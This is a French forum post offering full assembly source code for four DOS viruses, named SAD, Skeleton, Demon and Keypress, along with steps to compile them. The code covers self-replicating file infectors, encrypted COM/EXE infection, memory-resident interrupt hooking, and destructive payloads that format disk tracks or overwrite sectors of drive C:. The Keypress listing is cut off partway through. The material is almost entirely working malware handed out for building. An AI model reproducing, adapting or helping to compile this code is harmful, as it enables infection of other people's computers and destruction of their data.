| ledoc | | lovers | | Nouveau membre |  | | 44 messages postés |
|  Posté le 28-11-2009 à 10:11:27   
| Virus
J'ai dressé une liste de quelques virus dont il est important de connaitre les fonctionnalités. Je donnerais aussi des codes sources de virus en assembleur. Bah et si on commençait par les codes sources, pour être sur de bien pouvoir les compiler: transposez les en txt avec Bloc-Notes en copiant collant, et renommez le .txt en .asm puis compilez:
SAD virus:
;
; ---- Data Segment Values ----
; ds:[0f6h] = read buffer location
; ds:[0f8h] = write buffer location
; ds:[0fah] = store length of virus at this location
; ds:[0fch] = store length of file to be infected at this location
; ds:[0feh] = filename of file to infect
;
.model tiny
.code
org 100h ; origin for .com files
start:
nop ; these two nop instructs will be used by 'Nasty'
nop ; to determine if a file is already infected
;******
;get date
;******
mov ah,2ah ; get the date
int 21h ; do it
cmp dh,09h ; is it September?
jnz do_not_activate ; if NO jmp do_not_activate
;****
;the nasty bit
;****
;*
;* 1. Print message
;*
lea dx,mess ; print message
mov ah,09 ; 'Nasty in September'
int 21h ; do it
;****
;* 2. Destroy disk
;****
mov ah,19h ; get current drive (returned in al)
int 21h ; do it
mov dl,al ; dl = drive # to be formated
mov ah,05 ; disk format function
mov cl,01 ; first sector
mov ch,00 ; first track
mov dh,00 ; head zero
mov al,10h ; 10h (16) sectors - 2 tracks
int 13h ; do it (overwrite first 16 tracks on currently
; selected disc)
do_not_activate:
mov cx,80h ; save parameters; set counter to 80h bytes
mov si,0080h ; offset in the current data segment of the byte
; to be copied
mov di,0ff7fh ; offset to which byte is to be moved
rep movsb ; move bytes until cx=0 (decrement cx by 1 each time
; loop is performed is done automatically)
; (increment by 1 of si & di is done automatically)
lea ax,begp ; load exit from program offset address into ax
mov cx,ax ; " " " " " " " cx
sub ax,100h ; subtract start of .com file address (100h) from ax
; ax now contains the length of the virus
mov ds:[0fah],ax ; put length of the virus into the data segment at
; offset 0fah
add cx,fso ; add fso (5h) to cx (offset address of exit)
; so, cx=cx+5
mov ds:[0f8h],cx ; move cx (end of virus + 5) into data segment at
; offset 0f8h. ** Start of the write buffer.
ADD CX,AX ; add virus length (ax) to cx ?????
mov ds:[0f6h],cx ; mov cx into data segment at offset 0f6h.
; ** Start of the read buffer
mov cx,ax ; mov length of virus into cx
lea si,start ; load address of 'start' (start of virus) into
; souce index
mov di,ds:[0f8h] ; mov the value of the write buffer (@ 0f8h) into
; destination index
rb: ; cx = counter (length of virus)
; si = offset of byte to be read
; di = offset of where to write byte to
; (auto decrement of cx & increment of si & di)
rep movsb ; copy the virus into memory
stc ; set the carry flag
lea dx,file_type_to_infect ; set infector for .com files only
mov ah,4eh ; find first file with specified params
mov cx,20h ; files with archive bit set
int 21h ; do it
; if file found, CF is cleared, else
; CF is set
or ax,ax ; works the below instructions (jz & jmp)
jz file_found ; if file found jmp file_found
jmp done ; if no file found, jmp done (exit virus)
file_found:
mov ah,2fh ; get dta (returned in es:bx)
int 21h ; do it
mov ax,es:[bx+1ah] ; mov size of file to be infected into ax
mov ds:[0fch],ax ; mov filesize into ds:[0fch]
add bx,1eh ; bx now points to asciz filename
mov ds:[0feh],bx ; mov filename into ds:[0feh]
clc ; clear carry flag
mov ax,3d02h ; open file for r/w (ds:dx -> asciz filename)
mov dx,bx ; mov filename into dx
int 21h ; do it (ax contains file handle)
mov bx,ax ; mov file handle into bx
mov ax,5700h ; get time & date attribs from file to infect
int 21h ; do it (file handle in bx)
push cx ; save time to the stack
push dx ; save date to the stack
mov ah,3fh ; read from file to be infected
mov cx,ds:[0fch] ; number of bytes to be read (filesize of file to
; be infected
mov dx,ds:[0f6h] ; buffer (where to read bytes to)
int 21h ; do it
mov bx,dx ; mov buffer location to bx
mov ax,[bx] ; mov contents of bx (first two bytes - as bx is
; 16-bits) into ax.
; Now check to see if file is infected... if the
; file is infected, it's first two bytes will be
; 9090h (nop nop)
sub ax,9090h ; If file is already infected, zero flag will be set
; thus jump to fin(ish)
jz fin
mov ax,ds:[0fch] ; mov filesize of file to be infected into ax
mov bx,ds:[0f6h] ; mov where-to-read-to buffer into bx
mov [bx-2],ax ; correct old len
mov ah,3ch ; Create file with handle
mov cx,00h ; cx=attribs -- set no attributes
mov dx,ds:[0feh] ; point to name
clc ; clear carry flag
int 21h ; create file
; Note: If filename already exists, (which it does)
; truncate the filelength to zero - this is ok as
; we have already copied the file to be infected
; into memory.
mov bx,ax ; mov file handle into bx
mov ah,40h ; write file with handle (write to the file to be
; infected) - length currently zero
; cx=number of bytes to write
mov cx,ds:[0fch] ; length of file to be infected
add cx,ds:[0fah] ; length of virus
mov DX,ds:[0f8h] ; location of write buffer (this contains the virus
; + the file to be infected)
int 21h ; write file
; new file = virus + file to be infected
mov ax,5701h ; restore original time & date values
pop dx ; get old date from the stack
pop cx ; get old time from the stack
int 21h ; do it
; Note: Infected file will now carry the time & date
; it had before the infection.
mov ah,3eh ; close file (bx=file handle)
int 21h ; do it
; Note: date & time stamps automatically updated if
; file written to.
fin:
stc ; set carry flags
mov ah,4fh ; find next file (.com)
int 21h ; do it
or ax,ax ; decides zero flag outcome
jnz done ; if no more .com files, jmp done
JMP file_found ; else begin re-infection process for new file.
done:
mov cx,80h ; set counter (cx) = 80h
mov si,0ff7fh ; source offset address (copy from here)
mov di,0080h ; destination offset address (copy to here)
rep movsb ; copy bytes! (cx is auto decremented by 1
; si & di are auto incremented by 1)
; Note: this is a 'restore parameters' feature
; this does the reverse of what what done earlier
; in the program (do_not_activate
mov ax,0a4f3h ;
mov ds:[0fff9h],ax ;
mov al,0eah ;
mov ds:[0fffbh],al ; reset data segment locations ??? (to previous
mov ax,100h ; values before virus infection)
mov ds:[0fffch],ax ;
lea si,begp ; load exit from program offset address into si
lea di,start ; load offset address of start of virus into di
mov ax,cs
mov ds:[0fffeh],ax ; re-align cs = ds ???
mov kk,ax
mov cx,fso
db 0eah ; define byte
dw 0fff9h ; define word
kk dw 0000h ; define kk = word
mess db 'Sad virus - 24/8/91',13,10,'$' ; virus message to display
file_type_to_infect db '*?.com',0 ; infect only .com files.
fso dw 0005h ; store 5 into 'fso'. dw means that fso is 2 bytes
; in size (a word)
; ----- alma mater
begp:
mov ax,4c00h ; normal dos termination (set al to 00)
int 21h ; do it
end start
Skeleton virus:
; target.asm : [Skeleton] by Deke
; Created wik the Phalcon/Skism Mass-Produced Code Generator
; from the configuration file skeleton.cfg
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
id = 'DA' ; ID word for EXE infections
entry_point: db 0e9h,0,0 ; jmp decrypt
startvirus:
decrypt: ; handles encryption and decryption
patch_startencrypt:
mov bp,offset startencrypt ; start of decryption
mov ax,(offset heap - offset startencrypt)/2 ; iterations
decrypt_loop:
db 2eh,81h,76h,0 ; xor word ptr cs:[bp], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc bp ; calculate new decryption location
inc bp
dec ax ; If we are not done, then
jnz decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
cmp sp,id ; COM or EXE?
je restoreEXE
restoreCOM:
lea si,[bp+offset save3]
mov di,100h
push di ; For later return
movsb
jmp short restoreEXIT
restoreEXE:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+offset oldCSIP2]
lea di,[bp+offset oldCSIP]
movsw
movsw
movsw
restoreEXIT:
movsw
mov byte ptr [bp+numinfec],3 ; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+offset newDTA] ; new DTA @ DS:DX
int 21h
lea dx,[bp+offset exe_mask]
call infect_mask
lea dx,[bp+offset com_mask]
call infect_mask
done_infections:
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
cmp sp,id-4 ; EXE or COM?
jz returnEXE
returnCOM:
int 21h
retn ; 100h is on stack
returnEXE:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+oldCSIP+2],ax
add ax,word ptr cs:[bp+oldSSSP+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+oldSSSP]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
oldCSIP db ? ; Original CS:IP (4 bytes)
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
oldSSSP dd ? ; Original SS:SP
oldCSIP2 dd ?
oldSSSP2 dd ?
creator db '[MPC]',0 ; Mass Produced Code Generator
virus db '[Skeleton]',0
author db 'Deke',0
infect_mask:
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS:DX points to mask
jc exit_infect_mask ; No mo files found
xor cx,cx ; Clear attributes
call attributes ; Set file attributes
mov ax,3d02h ; Open read/write
int 21h
xchg ax,bx
mov ah,3fh ; Read file to buffer
lea dx,[bp+offset buffer] ; @ DS:DX
mov cx,1Ah ; 1Ah bytes
int 21h
mov ax,4202h ; Go to end of file
xor cx,cx
cwd
int 21h
cmp word ptr [bp+buffer],'ZM'; EXE?
jz checkEXE ; Why yes, yes it is!
checkCOM:
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
cmp ax,65535-(endheap-decrypt) ; Is it too large?
ja find_next
mov cx,word ptr [bp+buffer+1]; get jmp location
add cx,heap-startvirus+3 ; Adjust for virus size
cmp ax,cx ; Already infected?
je find_next
jmp infect_com
checkEXE:
cmp word ptr [bp+buffer+10h],id ; is it already infected?
jnz infect_exe
done_file:
mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h
mov ah,3eh ; Close file
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes
cmp byte ptr [bp+numinfec], 0; Enough infections?
jnz find_next
pop ax ; remove call from stack
jmp done_infections
find_next:
mov ah,4fh ; find next file
jmp short findfirstnext
exit_infect_mask: ret
infect_exe:
mov cx, 1ah
push cx
push bx ; Save file handle
les ax,dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+oldCSIP2], ax
mov word ptr [bp+oldCSIP2+2], es
les ax,dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+oldSSSP2],es
mov word ptr [bp+oldSSSP2+2],ax
mov ax,word ptr [bp+buffer+8]; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx
les ax,dword ptr [bp+newDTA+26] ; Get file size
mov dx, es ; to DX:AX
push ax
push dx
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
mov cx, 10h ; Convert to segment:offset
div cx ; form
mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h], id
pop dx ; get file length
pop ax
pop bx ; Restore file handle
add ax, heap-startvirus ; add virus size
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1 ; mod 512
mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax
push cs ; restore ES
pop es
mov ax,word ptr [bp+buffer+14h] ; needed later
jmp short finishinfection
infect_com: ; ax = filesize
mov cx,3
push cx
sub ax,cx
lea si,[bp+offset buffer]
lea di,[bp+offset save3]
movsw
movsb
mov byte ptr [si-3],0e9h
mov word ptr [si-2],ax
add ax,103h
finishinfection:
add ax,offset startencrypt-offset decrypt
push ax
mov ah,2ch ; Get current time
int 21h ; dh=sec,dl=1/100 sec
mov [bp+decrypt_value],dx ; Set new encryption value
lea di,[bp+offset codestore]
mov al,55h ; push bp
stosb
lea si,[bp+offset decrypt] ; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move
push si ; Save for later use
push cx
rep movsb
lea si,[bp+offset write] ; Copy writing function
mov cx,endwrite-write ; Bytes to move
rep movsb
pop cx
pop si
pop ax
push di
push si
push cx
rep movsb ; Copy decryption function
mov word ptr [bp+patch_startencrypt+1],ax
mov al,5dh ; pop bx
stosb
mov al,0c3h ; retn
stosb
call codestore ; decryption
pop cx
pop di
pop si
rep movsb ; Restore decryption function
mov ax,4200h ; Move file pointer
xor cx,cx ; to beginning of file
cwd ; xor dx,dx
int 21h
mov ah,40h ; Write to file
lea dx,[bp+offset buffer] ; Write from buffer
pop cx ; cx bytes
int 21h
dec byte ptr [bp+numinfec] ; One mo infection
jmp done_file
attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+offset newDTA+30] ; filename in DTA
int 21h
ret
write:
pop bp ; Restore relativeness
mov ah,40h ; Write to file
lea dx,[bp+offset decrypt] ; Concatenate virus
mov cx,heap-decrypt ; # bytes to write
int 21h
push bp
endwrite:
exe_mask db '*.exe',0
com_mask db '*.com',0
heap: ; Variables not in code
; The following code is the buffer for the write function
codestore:db (startencrypt-decrypt)*2+(endwrite-write)+3 dup (?)
newDTA db 43 dup (?) ; Temporary DTA
numinfec db ? ; Infections this run
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
end entry_point
Demon Virus:
;========== Demon virus ==================================== 22.09.91 ========
;
; Assemble and link with: TASM DEMON.VIR
; TLINK DEMON /X/T
; Infect all .COM programs in current directory with: DEMON
;
; !!! NOT ON A TUESDAY !!!
;
;-------------- Constants and structures
Tuesday = 2 ; INT 21h, AH=2Ah
Search_Rec struc ; directory search record
db 21 dup (?) ; reserved for DOS
FileAttr db ? ; file attribute
FileTime dw ? ; packed file time
FileDate dw ? ; packed file date
FileSize dd ? ; long file size
FileName db 13 dup (?) ; ASCIIZ FILENAME.EXT
Search_Rec ends
;-------------- Demon virus segment
Virus segment
assume cs:Virus,ds:Virus,es:Virus,ss:Virus
org 0080h
DTA Search_Rec <> ; disk transfer area
org 0100h
Demon: ; virus entry point
Virus_Size = Virus_End - Demon ; virus size = 272 bytes
mov dx,offset All_COM ; find first .COM file,
mov ah,4eh ; including hidden/system
mov cx,110bh
int 21h
nop
jnc Infect ; abort if no files found
jmp short Check_Day
Infect: call Replicate ; overwrite first 272 bytes
mov dx,offset DTA
mov ah,4fh ; find next .COM file,
int 21h ; go check day if none found
nop ; else repeat
jnc Next_File
jmp short Check_Day
Next_File: jmp Infect
Check_Day: mov ah,2ah ; get DOS date, check day
int 21h
cmp al,Tuesday ; Tuesday ?
je Thrash_Drive ; if yes, thrash drive C:
mov ah,4ch ; else exit to DOS
int 21h
Thrash_Drive: mov Counter,0 ; overwrite first 160 sectors
jmp Write_Sectors ; of drive C: with garbage
Write_Sectors: mov al,Drive_C ; Error: doesn't work !
mov cx,160 ; AL=C:, CX=160 sectors
mov dx,0 ; DX=highest sector in drive !
mov bx,0 ; DS:BX=start of PSP area
int 26h ; overwrite sectors
inc Counter
cmp Counter,10 ; repeat 10 times
je Show_Msg
jne Write_Sectors
Show_Msg: mov ah,09h ; show a fake error message
mov dx,offset Virus_Msg ; and exit to DOS
int 21h
mov ah,4ch
int 21h
Replicate: mov dx,offset DTA.FileName ; save file attribute
mov ax,4300h
int 21h
mov COM_Attr,cx
nop
xor cx,cx ; unprotect the .COM file
mov ax,4301h ; in case it's read-only
int 21h
nop
mov ax,3d02h ; open .COM file for R/W,
int 21h ; abort on error
nop
jc Check_Day
mov bx,ax ; BX = file handle
mov ax,5700h
int 21h ; save file date and time
nop
mov COM_Time,cx
mov COM_Date,dx
mov dx,offset Demon ; overwrite first 272 bytes
mov ah,40h ; of .COM program file
mov cx,Virus_Size ; with the virus code
int 21h
nop
mov ax,5701h ; restore file date and time
mov dx,COM_Date
mov cx,COM_Time
int 21h
mov ah,3eh ; close the file
int 21h
nop
mov dx,offset DTA.FileName ; restore file attribute
mov cx,COM_Attr
mov ax,4301h
int 21h
retn
All_COM db '*.COM',0 ; dir search specification
COM_Date dw 0 ; packed .COM program date
COM_Time dw 0 ; packed .COM program time
COM_Attr dw 0 ; .COM program file attribute
Counter db 0 ; used when thrashing drive C:
Drive_C db 2 ; INT 26h C: drive number
dw 0
Copyright db 'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)'
dw 0
Virus_Msg db 10,13,'Error eating drive C:',10,13,'$'
Virus_End label byte ; virus code+data end
Virus ends
end Demon
Keypress Virus:
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;********************************************************
; Source code of the Keypress Virus - Made by XSTC
; Made in A86 v3.07
;
; The Keypress Virus installs itself in top of DOS
; memory, without using DOS resident functions. It will
; hook int 1Ch (timer) and 21h (DOS) and will copy every
; 10 minutes during 2 seconds the keys you press five
; times (so if you press '1' it will be '111111') - if
; you press no key, it will usually give ESCs.
;
; In DOS 3+ it spreads to every file executed - so it
; can, besides COM/EXE, infect DRV/OVL/etc.
; It also spreads itself in DOS 1 and 2 with a special
; routine - in this case only COM/EXE files will be
; infected.
;
; It adds, after making full paragraphs of the file
; length, 1232 bytes to COM-files and 1216 to EXE.
;
; This code is only made to show the possibilities and
; dangers of a virus. It is only intended for research
; purposes - spreading a virus is prohibited by law.
;
; NOTE - The compiled code is not 100% compatible with
; the Keypress virus. A86 compiles the 'ADD BX,AX' and
; 'MOV DI,SI' different. This has totally no effect
; on the program.
;********************************************************
; After compiling the new virus, enter the new size in paragraphs in VirParSize
; and compile again.
VirParSize equ 4Ch ; Size of the original KeyPress virus
VirStart: jmp long VirBegin
db 0
ComStart: mov bx,cs ; When the virus has infected a .COM file,
add bx,[102h] ; this is the jump to the virus. Actually,
push bx ; this code is overwritten with the code
mov bx,offset VirBegin ; in the end of the virus.
push bx
retf
EB02 dw 02EBh ; 'jmp 104' - first 2 bytes in .COM file
VirSize dw VirParSize shl 4 ; Size of virus in whole pars
VirPars dw VirParSize + 1 ; Size of virus in pars+1
MaxComSize dw 0FF00h-VirParSize ; Max. size .COM file to infect (100h stack)
Com_or_exe db 00h ; 0 = Com-File, 1 = Exe-File
R_Ax dw (?)
R_Bx dw (?)
R_Cx dw (?)
R_Dx dw (?)
R_Di dw (?)
R_Si dw (?)
R_Bp dw (?)
R_Es dw (?)
R_Ds dw (?)
R_SS dw (?)
R_SP dw (?)
Exe_CS dw (?)
Exe_IP dw (?)
VirBegin: call Save_Regs ; Start of virus
call Fix_cs_ss ; Fix CS and SS of orig. prog (for .EXE files)
call Get_cs_ip ; Get CS and IP of original prog
call Check_res ; Check virus already resident
jb Exit_inst ; Yes, quit
call Inst_mem ; Install in memory
jb Exit_inst ; Error, quit
call Inst_ints ; Hook interrupts
Exit_Inst: jmp short Rst_regs_prg
nop
Jmp_Prg: db 0EAh ; Jump to original program
PrgOfs dw (?)
PrgSeg dw (?)
Check_res: push ds
xor bx,bx
mov ds,bx
mov bx,600h ; Unused word in memory
cmp word ptr [bx],1 ; Already installed?
jz Installed ; Yes
mov word ptr [bx],1 ; No
stc
Installed: cmc
pop ds
ret
;*** For .EXE: Fix orig-prog CS and SS ***
Fix_cs_ss: test byte ptr [Com_or_exe],1
jz no_exe
mov ax,es
add ax,10h
add Exe_cs,ax
add R_ss,ax
No_Exe: ret
;*** Get CS + IP of orig. program, and for .COM: Restore first 16 bytes ***
Get_cs_ip: mov ax,[Exe_cs]
mov bx,[Exe_ip]
test byte ptr [Com_or_exe],1
jnz No_rest ; .EXE file: no restore of first bytes
mov ax,es
mov bx,100h
mov cx,10h
mov si,offset First_bytes
mov di,100h
cld
repz ; Restore first 16 bytes (.COM file)
movsb
No_rest: mov [Prgseg],ax
mov [Prgofs],bx
ret
;*** Proc: Save the registers to restore them after the virus has ended ***
Save_Regs: mov cs:R_ds,ds
push cs
pop ds
mov R_ax,ax
mov R_bx,bx
mov R_cx,cx
mov R_dx,dx
mov R_di,di
mov R_si,si
mov R_bp,bp
mov R_es,es
ret
;*** Restore regs for original program ***
Rst_regs_prg: mov ax,R_ax
mov bx,R_bx
mov cx,R_cx
mov dx,R_dx
mov bp,R_bp
mov di,R_di
mov si,R_si
mov es,R_es
test byte ptr [Com_or_exe],1
jz No_StackRest ; No stack restore for .COM files
cli
mov ss,[R_ss] ; Restore .EXE stack
mov sp,[R_sp]
sti
No_StackRest: mov ds,R_ds
jmp short jmp_prg
;*** Restore regs for interrupts ***
Rst_regs_int: mov ax,R_ax
mov bx,R_bx
mov cx,R_cx
mov dx,R_dx
mov bp,R_bp
mov di,R_di
mov si,R_si
mov es,R_es
mov ds,R_ds
ret
;*** Proc: Search for last MCB ***
Last_MCB: push ds
mov bx,es
dec bx
Next_MCB: mov ds,bx
cmp byte ptr [0],5Ah ; Last MCB?
jz Is_last ; Yes
inc bx
add bx,[3] ; Go to next
cmp bx,0A000h ; In ROM?
jb Next_MCB ; No, try next one
Is_Last: pop ds
ret
;*** Proc: Install virus in end of memory ***
Inst_Mem: call Last_mcb ; Search last MCB
cmp bx,0A000h ; In ROM?
jb Not_ROM ; No, continue
No_Inst: push cs ; Yes, quit
pop ds
stc ; Error, virus not installed
ret
Not_ROM: mov ds,bx
mov ax,[3] ; AX = Size last MCB
sub ax,cs:[VirPars] ; - (Virussize in pars+1)
jbe no_inst ; Not enough memory, quit
cmp ax,800h
jb no_inst ; Less than 2048 pars free, quit
mov [3],ax ; Give program less space to install virus
add bx,ax
inc bx ; BX = seg where virus comes
mov es:[2],bx ; Enter in PSP, program not allowed there
sub bx,10h ; - 10h pars (virus starts at 100h)
push bx
push cs
pop ds
pop es
mov si,100h
mov di,si
mov cx,[VirSize] ; CX = virussize
cld
repz ; Copy virus to virus-segment
movsb
clc ; No error, virus installed
ret
;*** Install new interrupts (1C - Timer Tick, 21 - DOS) ***
Inst_Ints: push es
pop ds
mov word ptr [Ticks],0
mov ax,351Ch ; Get Addr Timer Tick
int 21h
mov I1c_ofs,bx
mov I1c_seg,es
mov ax,3521h ; Get Addr DOS-Int
int 21h
mov I21_ofs,bx
mov I21_seg,es
mov ax,251Ch
mov dx,offset New_I1c
int 21h ; Install New Timer-Tick Int
mov dx,offset I21_dos12
push dx
mov ah,30h ; Get DOS-Version
int 21h
pop dx
cmp al,3 ; Below 3.0?
jb DosBel3
mov dx,offset new_I21 ; No, new int
DosBel3: mov ax,2521h ; Install new DOS-Int
int 21h
push cs
pop ds
ret
;*** Proc: NEW 1C (TIMER TICK) INTERRUPT ***
; Every 10 minutes this routine sends during 2 sec. 180 extra keys to the
; keyboard-interrupt.
Ticks dw (?)
New_I1c: inc word ptr cs:[Ticks] ; Increment 'Ticks after virus loaded'
cmp word ptr cs:[Ticks],2A30h ; 10 minutes passed?
jb org_I1c ; No, go to orig. I1c
cmp word ptr cs:[Ticks],2A54h ; 2 sec. passed?
jbe screw_keys ; Not yet, give ESCs
mov word ptr cs:[Ticks],0 ; Time-counter to 0
jmp short Org_I1c ; Go to orig. I1c
Screw_Keys: push cx
mov cx,5 ; 5 times / tick
Put_Key: int 9 ; Give extra key
loop Put_key
pop cx
Org_I1c: db 0EAh ; Jump far to orig. I1c
I1c_Ofs dw (?)
I1c_Seg dw (?)
New_I24: mov al,0
New_I23: iret
I23_Ofs dw (?)
I23_Seg dw (?)
I24_Ofs dw (?)
I24_Seg dw (?)
ProgSize dw (?) ; Program size in paragraphs
New_I21: cmp ax,4B00h ; New DOS Int for DOS 3 +
jz Is_Start
jmp far dword ptr cs:[I21_Ofs] ; Jmp orig. I 21
Is_Start: call Save_Regs
call InstCritInt ; Install new ^c and crit. err. int
mov ax,3D02h ; Open file for read and write
mov ds,R_Ds
int 21h
push cs
pop ds
jc Close_File
mov bx,ax
call Read_header
jc Close_File
call Write_virus
jc Close_File
call Write_header
Close_File: mov ah,3Eh ; Close file
int 21h
call RestCritInt ; Restore ^c and crit-err ints
call Rst_regs_int
jmp far dword ptr cs:[I21_Ofs]
I21_Dos12: cmp ah,3Dh ; New DOS-Int for DOS 1.x and 2.x
jz Is_Open
JmpDos: db 0EAh ; Jump Far
I21_Ofs dw (?)
I21_Seg dw (?)
Is_Open: push ax ; Network-flags?
and al,0FCh
pop ax
jnz JmpDos ; Yes -> DOS
call Save_Regs
call InstCritInt ; Install new ^c and crit. err. int
mov DS,R_Ds
or al,2 ; Write access
pushf
cli
call far cs:[I21_Ofs] ; Open file
push cs
pop ds
jc Open_Error ; Error opening -> DOS
pushf
mov [R_Ax],ax ; Save handle
mov bx,ax
call Chk_Inf ; Check infection is possible
jc No_Infect ; No -> quit
call Read_header
jc No_Infect
call Write_virus
jc No_Infect
call Write_header
No_Infect: call Go_file_beg ; Go to begin of file
call RestCritInt ; Restore ^c and crit-err ints
call Rst_regs_int
popf
retf 2
Open_Error: call RestCritInt ; Restore ^c and crit-err ints
call Rst_regs_int
jmp short JmpDos
;*** Proc: Buffer for header of program to infect ***
Head_buf dw 0Ch dup (?)
;*** Proc: Install new ^C and crit. err. interrupt ***
InstCritInt: push ax
push bx
push dx
push ds
push es
push cs
pop ds
mov ax,3523h ; Get Ctrl-Break Int Addr
int 21h
mov I23_Ofs,bx
mov I23_Seg,es
mov ax,3524h ; Get Crit. Err Int Addr
int 21h
mov I24_Ofs,bx
mov I24_Seg,es
mov ax,2523h
mov dx,offset New_I23 ; Install new Ctrl-Break Int
int 21h
mov ax,2524h ; Install new Crit. Err Int
mov dx,offset New_I24
int 21h
pop es
pop ds
pop dx
pop bx
pop ax
ret
;*** Proc: Restore orig. ctrl-break and crit. err. interrupt ***
RestCritInt: mov ax,2524h ; Rest. orig. crit. err int
lds dx,dword ptr cs:[I24_Ofs]
int 21h
mov ax,2523h ; Rest. orig. ctrl-break int
lds dx,dword ptr cs:[I23_Ofs]
int 21h
push cs
pop ds
ret
;*** Read header of file ***
Read_header: mov ah,3Fh
mov dx,offset Head_buf
mov cx,18h
int 21h
jc HeadRead_Err ; Error reading, don't infect
call Check_infect ; Check file already infected; if not, save data
jc HeadRead_Err ; Error, quit
call Calc_data ; Calculate data for infected file
jc HeadRead_Err ; Error, quit
HeadRead_Err: ret
;*** Proc: Write virus, and for .COM files, write first 16 bytes behind virus ***
Write_virus: mov ah,40h ; Write virus behind program
mov cx,[VirSize]
mov dx,100h
int 21h
jc Err_Writ ; Write error, quit
cmp ax,cx
jnz Err_Writ ; ' ' ' ' ' '
test byte ptr [Com_or_exe],1
jz First_Write
ret
First_Write: mov ah,40h ; Write orig. 1st 16 bytes behind virus
mov cx,10h
mov dx,offset Head_buf
int 21h
jc Err_Writ ; Write error, quit
cmp ax,cx
jnz Err_Writ ; ' ' ' ' ' '
clc ; End procedure, no error
ret
Err_Writ: stc ; End procedure, error
ret
;*** Proc: .COM: Write jump-to-virus, .EXE: Write header ***
Write_header: call Go_file_beg ; Go to begin of file
test byte ptr [Com_or_exe],1 ; .EXE-file?
jnz Exe_header
mov ah,40h ; .COM file - Write 'EB 02'
mov cx,2
mov dx,offset EB02
int 21h
mov ah,40h ; Write program-size in pars
mov cx,2
mov dx,offset ProgSize
int 21h
mov ah,40h ; Write rest of begin of virus
mov cx,0Ch
mov dx,104h
int 21h
ret
Exe_header: mov ah,40h ; Write in File
mov cx,18h
mov dx,offset Head_buf
int 21h
ret
;*** Proc: Change file pointer ***
Cng_file_ptr: mov ax,4200h
int 21h
ret
;*** Proc: Go to begin of file ***
Go_file_beg: xor cx,cx ; Filepointer = 0
xor dx,dx
call Cng_file_ptr ; Change File Pointer
ret
;*** Proc: Check file is already infected ***
Check_infect: mov si,104h
mov di,offset Head_buf+4
push cs
pop es
mov byte ptr [Com_or_exe],0 ; Flag for .COM
cmp word ptr [di-04],5A4Dh ; Is .EXE?
jz Is_Exe
mov cx,0Ch ; No, .COM file
cld
repz ; Already infected?
cmpsb
jnz Do_Infect ; Not yet
Dont_Infect: stc
ret
Do_Infect: clc
ret
Is_Exe: mov byte ptr [Com_or_exe],1 ; Flag for .EXE
mov cx,[offset Head_buf+14h] ; cx = Prog-IP
cmp cx,offset VirBegin ; Same as Vir-IP?
jz Dont_Infect ; Yes, quit
cmp word ptr [offset Head_buf+0Ch],0 ; Max extra pars=0?
jz Dont_Infect ; Yes, quit
mov [Exe_ip],cx ; Save prog-IP
mov cx,[Head_buf+16h]
mov [Exe_cs],cx ; Save prog-cs
mov cx,[Head_buf+0Eh]
mov [R_ss],cx ; Save prog-SS
mov cx,[Head_buf+10h]
mov [R_sp],cx ; Save prog-SP
jmp short Do_Infect
;*** Proc: Calculate data for infection ***
Calc_data: mov ax,4202h ; Go to EOF
xor cx,cx
xor dx,dx
int 21h
test al,0Fh ; Size mod 16 = 0 (File is exact x paragraps)?
jz No_par_add ; Yes, no extra par added
add ax,10h ; Add paragraph
adc dx,0 ; Overflow -> Inc dx
and ax,0FFF0h ; Make paragraphs
No_par_add: test byte ptr [Com_or_exe],1
jnz Calc_exe
or dx,dx
jnz not_infect
cmp ax,[maxcomsize] ; File too big?
ja not_infect ; Yes, quit
cmp ax,[VirSize] ; File too small?
jbe Not_Infect ; Yes, quit
mov [ProgSize],ax ; Save program-size
mov cl,4
shr word ptr [ProgSize],cl ; In paragraphs
mov dx,ax
xor cx,cx
call Cng_file_ptr ; Go to EOF
clc
ret
